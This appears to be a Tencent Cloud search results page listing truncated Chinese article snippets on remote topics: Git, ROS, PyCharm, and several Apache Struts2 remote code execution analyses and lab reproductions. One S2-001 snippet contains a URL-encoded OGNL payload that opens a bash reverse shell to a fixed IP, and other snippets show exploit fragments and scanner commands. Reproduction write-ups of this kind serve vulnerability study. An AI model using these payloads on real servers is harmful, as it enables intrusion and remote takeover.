- 综合排序
- 最热优先
- 最新优先
- 来自专栏全栈程序员必看
Git远程仓库(2)
Git 远程仓库 远程仓库 普通远程仓库搭建 环境 远程服务器安装 git 服务及新增用户 本地服务器生成密钥并放入远程服务器 初始化远程 git 仓库 设置远程 git 仓库权限 用户 git (1)生成密钥 本地服务器在 ~/.ssh 目录下可以找到 id_rsa.pub,里面就是公钥 ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub (2)将本地服务器生成的公钥放入远程服务器 (1)文件路径 vi /etc/passwd (2)修改配置 原配置 git:x:500:500::/home/git:/bin/bash 修改配置 git:x:500:500::/home/git 192.168.125.6" yum -y install gitlab-ee 访问 GitLab (1)按照上面 EXTERNAL_URL 指定的 url 访问 GitLab http://192.168.125.6 (2) 账号密码 账号:root 密码:12345678 GitLab 的使用 1、创建 OA 组 2、创建 zhss 用户,在 OA 组中加入 zhss 用户 账号:zhss 密码:12345678
64320发布于 2021-05-27 - 来自专栏腾讯DevOps
Git远程库操作2
腾讯工蜂Git:基于Git的企业级协作开发解决方案,腾讯未来研发关键系统 https://code.tencent.com 上篇讲述了推送本地仓库到远程库的操作,本篇则讲解如何从远程库同步代码到本地 此处的同步分为以下几种情况: 1、克隆远程库代码 git clone + 远程库路径 如git clone git@git.code.tencent.com:XXX/XXX.git 2、 同步远端分支变化 git fetch origin <branchname> #从远程的origin仓库的<branchname>分支下载代码到本地的origin/master,并不会合并 git diff <branchname >差异 git merge <branchname> #合并<branchname>分支到当前分支 git fetch #拉取所有分支的变化 git fetch -p #拉取所有分支的变化,并且将远程库中不存在的分支同步移除
85930发布于 2018-09-25 - 来自专栏技术杂记
可靠的远程代码执行(2)
它的定义如下: message CNETMsg_File { optional int32 transfer_id = 1; optional string file_name = 2; optional 消息通知客户端: message CMsg_CVars { message CVar { optional string name = 1; optional string value = 2;
3.8K100发布于 2021-07-09 - 来自专栏开发杂记
select2加载远程数据示例
核心js $("#query_pack_code").select2({ language: "zh-CN", allowClear: true, 参考资料: select2主页
1.8K20发布于 2019-08-09 - 来自专栏深蓝居
AMF学习2远程调用的封装
前言的前2字节用于说明AMF的版本,目前AMF有2个版本AMF0和AMF3.如使用AMF0则是:00 00 第3和第4字节用16位整数表示AMF头的数量。 说了这么多估计还是感觉比较抽象,下面给出个实例: AMF 16进制内容 00000000h: 00 00 00 00 00 01 00 1B 7A 68 2E 66 6C 65 65 74 ; ... .....zh.fleet 00000010h: 53 65 72 76 69 63 65 2E 67 65 74 46 6C 65 65 74 ; Service.getFleet 00000020h : 52 6F 77 00 03 2F 37 39 00 00 00 13 0A 00 00 00 ; Row../79........ 00000030h: 03 02 00 01 35 02 00 请求的方法的字符串长度为27个字节) 7A ……77(这27个直接就是调用的类和方法:“zh.fleetService.getFleetRow”) 00 03(请求的Target字符串长3字节) 2F
54010编辑于 2022-06-16 - 来自专栏剑指工控
AB最新2款远程IO模块
JZGKCHINA 工控技术分享平台 AB刚刚发布两款远程IO模块,一款是FLEX5000用于极端环境IO和安全IO,并替代1794FLEXIO,另外一款是可以部署在EX防爆区的1719防爆远程IO ,同时这两款远程IO模块也支持DLR环网并且速率达到1G。 5094 Filler Module 1719EX 本质安全分布式 1719 Ex I/O 解决方案可装于区域 2 或分区 2 环境,可帮助客户通过EtherNet/IP 集成危险区域(区域 0、1 Ex I/O 2 Point Digital Output 23V 1719-OB2L Ex I/O 2 Point Digital Output 16.5V 1719-IJ Ex I/O 2x8 Pole Screw Terminal 1719-TB8SX2 Ex I/O 2x8 Pole Spring Terminal 1719-TB6
1.2K30发布于 2021-11-09 - 来自专栏FreeBuf
Struts2 s2-032远程代码执行分析
介绍 Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。 Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。 虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081) ? 2. 漏洞分析 前提:开启动态方法调用。
72060发布于 2018-02-08 - 来自专栏全栈程序员必看
ROS远程控制(PC机+TX2进行ROS远程通讯)
需求:TX2连接Lidar获取点云数据,由于TX2安装在机器人上,不能外接屏幕,内存ROM也很小,所以采用TX2与雷达建立通讯,然后建立TX2和PC机的ROS远程通讯(PC机和TX2都安装ubuntu18.04 ) PC机和TX2全部为系统为18.04,ROS版本全部为melodic 下面开始部署两台机器 TX2作为主机用于数据采集 PC机作为从机用于数据监控 1、首先主机、从机连到同一个wifi下 使用ifconfig 以我自己的设备为例: PC机名为wzf-lenovo-N50-80,192.168.88.253 TX2名为nvidia-desktop,192.168.88.250 2、 然后打开hosts文件,在 =192.168.88.250 #TX2的IP export ROS_MASTER_URI=http://192.168.88.250:11311 #TX2的IP,11311不要更改 最后 source 当然PC机也可以使用rviz等命令,接收显示TX2采集的点云 实际测试的时候感觉PC机控制TX2,然后接收TX2发布的话题,卡顿严重。
1.8K20发布于 2021-04-07 - 来自专栏iis7
2008r2管理员远程桌面配置远程连接
我们已经在Win2008 R2 VDI动手系列的上一篇文章中配置了远程桌面虚拟化主机。远程桌面会话主机,请参考下图中的拓扑。本文的任务是将RDCB配置为远程桌面连接。代理。 RDCB使用的操作系统也是Windows Server 2008 R2。在本文中,RDCB是域中的单独服务器,但是在测试过程中,RDCB,RDSH和RDVH也可以集中在一台服务器上。 远程桌面管理工具的话,iis7远程桌面管理工具还不错,iis7远程桌面连接工具,又叫做iis7远程桌面管理软件,是一款绿色小巧,功能实用的远程桌面管理工具,其界面简洁,操作便捷,能够同时远程操作多台服务器 远程桌面连接代理的配置比较简单,在RDCB上打开服务器管理器,如图1所示,选择"添加角色"。 图1 如图2所示,在角色列表中选择"远程桌面服务"。 图2 接下来在角色服务中选择"远程桌面连接代理"。 图3 确认摘要无误后,点击"安装"开始角色部署。
1.7K10发布于 2019-10-14 - 来自专栏安恒信息
Struts2 s2-032远程代码执行分析
介绍: Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。 Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI完全脱离开,所以Struts 2可以理解为WebWork的更新产品。 虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081) ? 2. 漏洞分析 前提:开启动态方法调用。 ?
1.2K60发布于 2018-04-11 - 来自专栏look Java
(2)什么是服务拆分和远程调用
2 服务拆分和远程调用 任何分布式架构都离不开服务的拆分,微服务也是一样。 .导入demo工程 用IDEA导入课前资料提供的Demo: 项目结构如下: 导入后,会在IDEA右下角出现弹窗: 点击弹窗,然后按下图选择: 会出现这样的菜单: 配置下项目使用的JDK: 2.3.实现远程调用案例 @Bean public RestTemplate restTemplate() { return new RestTemplate(); } } 2.3.3.实现远程调用
28410编辑于 2023-12-07 - 来自专栏安全学习
S2-001 远程代码执行漏洞
%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new%20java.lang.ProcessBuilder username=admin&password=%25%7B%28%23cmd%3D%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.158%2F9999% 200%3E%261%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin% 23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28% 23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter
52920编辑于 2022-12-22 - 来自专栏锦小年的博客
pycharm使用笔记2-远程连接
随着科技的发展,远程办公已经是一种趋势,远程开发能力对于每一个程序员来说都是必不可少的。有时候就算在公司,在进行开发的时候有许多的数据都是储存在服务器上的,所以在服务器上开发显得省时省力。 在原理上来说,pycharm的远程功能仅仅就是提供了代码同步,配置Python解释器的时候选择服务器端的Python解释器,工作的时候pycharm先将本地代码同步到远程服务器,其次再使用远程服务器上的 这样一来就解释器就配置成功了 远程同步配置 点击 工具> deployment >configuration ? 按照下图填写: ? ? 远程配置: ? 解释器配置为远程,注意下面的path mapping 如果没有的话 进去添加 (本地和远程都要填写) 运行一下 : ssh://gxrao@192.168.1.101:22/home/gxrao/
2K100发布于 2018-01-02 - 来自专栏LuckySec网络安全
S2-009远程代码执行复现
0x01 漏洞简介 Struts2对S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2对S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线 vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-009 docker-compose build docker-compose up -d 0x03 漏洞检测 Struts2 漏洞检测工具 https://github.com/HatBoy/Struts2-Scan 使用工具检测 s2-009 漏洞 python3 Struts2Scan.py 23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2. s2-001/README.zh-cn.md
69750编辑于 2022-11-02 - 来自专栏LuckySec网络安全
S2-007远程代码执行复现
0x01 漏洞简介 S2-007漏洞一般出现在表单处。 vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-007 docker-compose build docker-compose up -d 0x03 参考文章 https://soapffz.com/sec/532.html#menu_index_6 https://github.com/vulhub/vulhub/blob/master/struts2/ s2-007/README.zh-cn.md
86120编辑于 2022-11-02 - 来自专栏LuckySec网络安全
S2-001远程代码执行复现
0x01 漏洞简介 S2-001漏洞是因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。 vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-001 docker-compose build docker-compose up -d 0x03 漏洞检测 Struts2 漏洞检测工具 https://github.com/HatBoy/Struts2-Scan 使用工具检测 s2-001 漏洞 python3 Struts2Scan.py org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2. s2-001/README.zh-cn.md
947100编辑于 2022-11-02 - 来自专栏LuckySec网络安全
S2-057 远程命令执行复现
0x01 漏洞简介 Apache wiki更新了一个Struts2的远程代码执行漏洞(S2-057),漏洞威胁等级为高危,漏洞对应的CVE编号为CVE-2018-11776。 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。 同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。 6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d 057 远程执行漏洞 && CVE-2018-11776 +') print('+-----------------------------------
62380编辑于 2022-11-02 - 来自专栏HACK学习
【漏洞预警】S2-057远程代码执行
Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 新漏洞刚被发现发布时,对很多企业网络来说可能是最危险的时刻,应对不及时而造成的危害可能是巨大的,特别是像Struts2 S2-057这样会搞死人的漏洞,显然黑客对他们的关注度比很多企业的安管人员要高的多 S2-057远程代码执行 漏洞简介 当namespace没有为基础xml配置中定义的结果设置值时,可以执行RCE攻击,同时,其上部操作配置没有或通配符namespace。 漏洞详情 l 危害等级:高危 l CVE编号:CVE-2018-5390 l 漏洞类型:远程代码执行 影响范围 Struts 2.3 - Struts 2.3.34 Struts 2.5 - Struts 2.5.16 处置建议 1.升级到Struts 2.3.35或Struts 2.5.17 2.临时解决方案: 验证您是否已namespace为基础xml配置中的所有已定义结果设置(并且始终不会忘记设置
46320发布于 2019-08-07 - 来自专栏网络安全615
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
一,Struts2是什么 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互 Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 虽然从Struts 1到Struts 2有着非常大的变化,但是相对于WebWork,Struts 2的变化很小。 getDefaultMessage函数,在这个函数里面调用了TextParseUtil.translateVariables在TextParseUtil.translateVariables方法中存在安全漏洞,可使远程攻击者通过构造的 cd struts2 cd s2-045 docker-compose up -d 访问靶场s2-045 http://your:ip/doUpload.action
3K20编辑于 2022-11-19 - 来自专栏云原生研究
Quarkus 云原生java开发框架2: 远程调用
本篇主要介绍了 Quarkus 中的远程调用,项目的结构采用了传统的微服务模式。演示了如何编写符合 istio 的 Quarkus java 程序。 consumer 模块 需要在配置里指定服务的远程调用地址: # 远程调用配置 xyzshop-provider/mp-rest/url=http://localhost:8080 #xyzshop-provider
2K74发布于 2020-05-24
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号